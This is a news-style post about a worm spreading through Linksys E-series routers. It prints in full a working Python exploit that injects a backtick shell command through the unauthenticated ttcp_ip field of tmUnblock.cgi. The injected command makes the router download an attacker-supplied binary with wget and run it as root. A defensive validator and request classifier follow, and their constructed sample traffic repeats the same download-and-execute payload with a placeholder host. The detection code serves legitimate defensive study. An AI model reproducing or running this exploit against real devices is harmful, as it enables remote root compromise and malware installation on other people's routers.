Linksys routers hit by a worm

As the Internet Storm Center (SANS Institute) reports, a worm is spreading through a security hole in Linksys routers.
Routers of the E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000 and E900 series are affected.

Exploit code for the E series has been published.

The worm has been dubbed "The Moon". The published proof of concept below (infodox, Insecurety Research) abuses the same flaw: a POST to tmUnblock.cgi, sent without any credentials, whose ttcp_ip parameter ends up in a shell command, so a backtick-quoted command placed in that field runs on the router as root. The script uses this to make the router fetch a binary with its BusyBox wget and execute it from /tmp:

import sys
import requests


def banner():
    # ANSI escape codes colour the banner green and reset the terminal afterwards.
    print("\x1b[0;32m" + r"""
.____    .__        __                          
|    |   |__| ____ |  | __  _________.__. ______
|    |   |  |/    \|  |/ / /  ___<   |  |/  ___/
|    |___|  |   |  \    <  \___ \ \___  |\___ \ 
|_______ \__|___|  /__|_ \/____  >/ ____/____  >
        \/       \/     \/     \/ \/         \/ 
       You are the weakest link. Goodbye.
Linksys remote root – infodox – Insecurety Research.
Version 2: Crippled (wget shelldrop only)
    """ + "\x1b[0m")


def upShell(wget_url, target):
    """Download a binary to /tmp with the router's BusyBox wget, make it
    executable and run it. This works with the normal busybox wget at least,
    and worked in testing."""
    cmd = "wget %s -O /tmp/.trojan;chmod 777 /tmp/.trojan;/tmp/.trojan" % (wget_url)
    print("{+} Planting Bomb!")
    execute_command(target=target, command=cmd)
    print("{!} TERRORISTS WIN!")


def execute_command(target, command):
    url = target + "/tmUnblock.cgi"
    # The CGI hands ttcp_ip to a shell as the host argument ("-h <host>");
    # wrapping the payload in backticks makes the shell run it as a
    # command substitution before the ttcp test is even started.
    injection = "-h `%s`" % (command)
    # this is a very sexy POST request. TOTALLY LEGIT.
    the_ownage = {'submit_button': '',
                  'change_action': '',
                  'action': '',
                  'commit': '0',
                  'ttcp_num': '2',
                  'ttcp_size': '2',
                  'ttcp_ip': injection,
                  'StartEPI': '1'}
    headers = {'User-Agent': 'Mozilla/4.0 (compatible; Opera/3.0; Windows 4.10) 3.51 [en]'}
    # it is truly mad hax. Note that no credentials of any kind are sent.
    mad_hax = requests.post(url=url, data=the_ownage, headers=headers)
    return mad_hax


def main(args):
    banner()
    if len(args) != 3:
        sys.exit("usage: %s http://target http://me.com/trojan.bin" % (args[0]))
    upShell(wget_url=args[2], target=args[1])


if __name__ == "__main__":
    main(sys.argv)
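For anyone who has to find this traffic rather than send it, the following is an added example (not part of the original post and not infodox's code) that does two things the script above makes obvious: it applies the allow-list check tmUnblock.cgi should have applied to ttcp_ip (only a literal IPv4 address is acceptable), and it classifies captured POST requests to that endpoint, pulling the backtick-quoted command out of a hit so the dropper URL and the drop path are immediately visible. The sample request bodies are constructed here; the dropper host dropper.invalid is a placeholder, and the attack body is built with the same urlencoding that requests.post(data=...) applies to the exploit's form dictionary.

```python
import re
import ipaddress
from urllib.parse import parse_qs, urlencode

# Shell metacharacters that let a "host" value escape the -h argument once the
# CGI interpolates it into a shell command; the exploit above relies on backticks.
SHELL_META = re.compile(r"[`$;&|<>\n]")


def ttcp_ip_is_safe(value):
    """Allow-list check: a ttcp_ip value is acceptable only as a literal IPv4
    address. This is the validation the CGI should perform before shelling out."""
    try:
        ipaddress.IPv4Address(value)
    except ValueError:
        return False
    return True


def injected_command(value):
    """Return the command wrapped in backticks inside a ttcp_ip value, or None."""
    match = re.search(r"`([^`]*)`", value)
    return match.group(1) if match else None


def classify_request(path, body):
    """Classify one POST (request path plus urlencoded body) as ok, suspicious or attack."""
    if not path.endswith("/tmUnblock.cgi"):
        return "ok"
    form = parse_qs(body, keep_blank_values=True)
    ip = form.get("ttcp_ip", [""])[0]
    if ttcp_ip_is_safe(ip):
        return "ok"
    if SHELL_META.search(ip):
        return "attack"
    return "suspicious"


def scan(requests_seen):
    """Run classify_request over (path, body) pairs and return
    (path, verdict, injected command) for every request that is not ok."""
    findings = []
    for path, body in requests_seen:
        verdict = classify_request(path, body)
        if verdict != "ok":
            ip = parse_qs(body, keep_blank_values=True).get("ttcp_ip", [""])[0]
            findings.append((path, verdict, injected_command(ip)))
    return findings


# Constructed sample traffic (not captured data). The attack body mirrors the
# form dictionary the exploit posts, with a placeholder dropper URL.
PAYLOAD = ("wget http://dropper.invalid/trojan.bin -O /tmp/.trojan;"
           "chmod 777 /tmp/.trojan;/tmp/.trojan")
ATTACK_BODY = urlencode({
    "submit_button": "", "change_action": "", "action": "", "commit": "0",
    "ttcp_num": "2", "ttcp_size": "2", "ttcp_ip": "-h `%s`" % PAYLOAD, "StartEPI": "1",
})
SAMPLE_REQUESTS = [
    # a legitimate ttcp test against a LAN host
    ("/tmUnblock.cgi", "ttcp_num=2&ttcp_size=2&ttcp_ip=192.168.1.100&StartEPI=1"),
    # the exploit above
    ("/tmUnblock.cgi", ATTACK_BODY),
    # not an IP address, but no shell metacharacters either
    ("/tmUnblock.cgi", "ttcp_num=2&ttcp_size=2&ttcp_ip=-h+router.lan&StartEPI=1"),
    # same parameter on a different endpoint: out of scope for this check
    ("/index.html", "ttcp_ip=%60id%60"),
]

if __name__ == "__main__":
    for path, verdict, command in scan(SAMPLE_REQUESTS):
        print(verdict, path, command)
```

On the constructed sample the scan flags the exploit request as an attack with the full wget command recovered, and the non-IP host as suspicious. Anything in the "suspicious" bucket deserves a look as well: a value that is not an IPv4 address is not a legitimate use of this form, whatever characters it contains, and the allow-list check is the right fix on the device side because it refuses the whole class of injections instead of a list of known metacharacters.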